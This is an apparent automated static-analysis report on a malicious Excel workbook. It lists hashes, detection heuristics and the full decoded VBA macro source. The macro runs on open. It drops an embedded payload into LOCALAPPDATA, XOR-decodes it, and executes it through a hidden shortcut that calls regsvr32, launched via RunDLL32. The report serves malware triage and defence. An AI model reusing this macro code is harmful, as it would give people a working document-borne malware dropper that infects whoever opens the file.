Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 981c5d0c40862929…

MALICIOUS

Office (OLE) / .XLS

Size: 76.5 KB · Created: 2025-07-21 14:34:34 · Authoring application: Microsoft Excel · First seen: 2026-06-21
MD5: c347425dd7930e4008b77bc80fd204b3 · SHA-1: 3abdb8273ef2f5f161aea9d9b1fbbbbed697f2b1 · SHA-256: 981c5d0c4086292903c9f27312c0c446a0d0599010a776839098c57337846d8d
Risk Score: 258

Heuristics (8)

  • XOR-encoded strings (key 0x4A) critical SC_XOR_ENCODED
    Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x4A: 'kernel32.dll', 'VirtualProtect'
    Disassembly: x86 · validity: uncertain (0.553) — 1/1 branch targets land on an instruction boundary (100% coherence)
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv"
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas · vba-macro · oletools.olevba.extract_macros (decoded VBA source) · 4561 bytes
SHA-256: 63eb849d8cb3c752479d2e21bd0fb702cf2604c3f6ff1bc669e20f8ac5bced80
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function BnitWDvCj() As String
    Dim hMZRAtjSR As String
    Dim bhJpP As Object
    
    hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv"
    Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}")

    If Not bhJpP.FolderExists(hMZRAtjSR) Then
        bhJpP.CreateFolder (hMZRAtjSR)
    Else
    End If

    BnitWDvCj = hMZRAtjSR
End Function

Function cWnFD5ECd8Gw9b(ThGHAhmxQ() As Byte, yrZxqN3O As Byte) As Byte()
    Dim MIoNQFixNBXX As Long
    Dim LkTacRo5NzGc() As Byte
    
    
    ReDim LkTacRo5NzGc(LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ))
    
    For MIoNQFixNBXX = LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ)
        LkTacRo5NzGc(MIoNQFixNBXX) = ThGHAhmxQ(MIoNQFixNBXX) Xor yrZxqN3O
    Next MIoNQFixNBXX
    
    cWnFD5ECd8Gw9b = LkTacRo5NzGc
End Function


Function gPfWuMRpyskE(fileName As String)
    Dim hjadgqwdbku As String
    Dim gsdfsdf As Byte
    Dim asdasdascasc() As Byte
    Dim kjhjtyjvbnnfd() As Byte
    Dim fdsjkhfdsjklnfs As Integer
    Dim tyuiojlkh As Long
    
    hjadgqwdbku = fileName
    gsdfsdf = Asc("J")

    
    fdsjkhfdsjklnfs = FreeFile
    Open hjadgqwdbku For Binary Access Read As #fdsjkhfdsjklnfs
    
        tyuiojlkh = LOF(fdsjkhfdsjklnfs)
    
        ReDim asdasdascasc(0 To tyuiojlkh - 1)
        Get #fdsjkhfdsjklnfs, , asdasdascasc
    Close #fdsjkhfdsjklnfs

    
    kjhjtyjvbnnfd = cWnFD5ECd8Gw9b(asdasdascasc, gsdfsdf)

    
    Open hjadgqwdbku For Binary Access Write As #fdsjkhfdsjklnfs
        Put #fdsjkhfdsjklnfs, , kjhjtyjvbnnfd
    Close #fdsjkhfdsjklnfs

End Function

Sub MrAyjD2rl(QRYSKkuXeU As String, SsUI As String)
    Dim bhJpP As Object
    Dim uDO5QeoeYCZ As String
    Dim sVXb2RfN As String
    
    Set bhJpP = CreateObject("Scripting.FileSystemObject")
    
    uDO5QeoeYCZ = Environ("TEMP")
    
    sVXb2RfN = bhJpP.BuildPath(uDO5QeoeYCZ, SsUI)
    
    If bhJpP.FileExists(sVXb2RfN) Then
        bhJpP.CopyFile sVXb2RfN, QRYSKkuXeU
    End If
    
    Set bhJpP = Nothing
End Sub

Sub VhRwO4WtSm()
    Dim uv1YWDCyOnxwN As Object
    Dim s6WjBf8hE As Object
    Dim e6IbjCVf As Object
    Dim nLb39ozpR As String
    Dim ZfUebm89krgz As String

    Dim hMZRAtjSR As String
    Dim GWC05BplCrglUAd As String
    GWC05BplCrglUAd = "0x00bac729fe.log"

    If Dir(hMZRAtjSR & "\0x00bac729fe.log") = "" Then
        
        hMZRAtjSR = BnitWDvCj()
        Call MrAyjD2rl(hMZRAtjSR & "\0x00bac729fe.log", GWC05BplCrglUAd)
        'Call Pc0riX9L1HYlDKY(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
        'Call i8lh(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
        gPfWuMRpyskE (hMZRAtjSR & "\0x00bac729fe.log")

        
        Set BDYBXoXN2 = CreateObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
        n4lpppiDcX08yM = BDYBXoXN2.ExpandEnvironmentStrings("%appdata%") + "\Microsoft\Windows\"
        d1C6kWo5qGIcZ = "Protection overview.lnk"
        Set sl88rbqsvJ4 = BDYBXoXN2.CreateShortcut(n4lpppiDcX08yM & d1C6kWo5qGIcZ)
        
        sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe"
        sl88rbqsvJ4.Arguments = " /u /s " & Chr(34) & hMZRAtjSR & "\0x00bac729fe.log" & Chr(34)
        sl88rbqsvJ4.Description = ""
        sl88rbqsvJ4.WindowStyle = "0"
        sl88rbqsvJ4.WorkingDirectory = n4lpppiDcX08yM
        sl88rbqsvJ4.Save
        Set sl88rbqsvJ4 = Nothing
        
        ' execute sl88rbqsvJ4 TitQzflyfw
        Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0
        
    End If


End Sub

Sub Workbook_open()
    Dim rSDI94TRmtiDL As OLEObject
    Set rSDI94TRmtiDL = Sheet1.OLEObjects(1)
    rSDI94TRmtiDL.Copy
    Dim TgKXzG3crsgMKgC1 As Object
    Set TgKXzG3crsgMKgC1 = CreateObject("ADODB.Stream")
    TgKXzG3crsgMKgC1.Type = 1
    TgKXzG3crsgMKgC1.Open
    TgKXzG3crsgMKgC1.Close

    VhRwO4WtSm

End Sub
ole10native_00.bin · ole-package · OLE Ole10Native stream: MBD000064B2/Ole10Native · 40278 bytes
SHA-256: 2e6ac7112a6f4a8a3df017e74c7192f3ec6fead38218a092bb405098684f93b3
ole10native_00_0x00bac729fe.log · ole-package-payload · OLE Ole10Native payload: MBD000064B2/Ole10Native; display_name=0x00bac729fe.log; full_path=C:\Users\user\AppData\Local\Temp\0x00bac729fe.log; temp_path=; def_file= · 39936 bytes
SHA-256: 37946cb6ca884e446e897fa4af2de9f765a0835dc203ec04a15dd01add3c6c6f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
380 of 410 identifiers look randomly generated (e.g. 'rJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ') — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).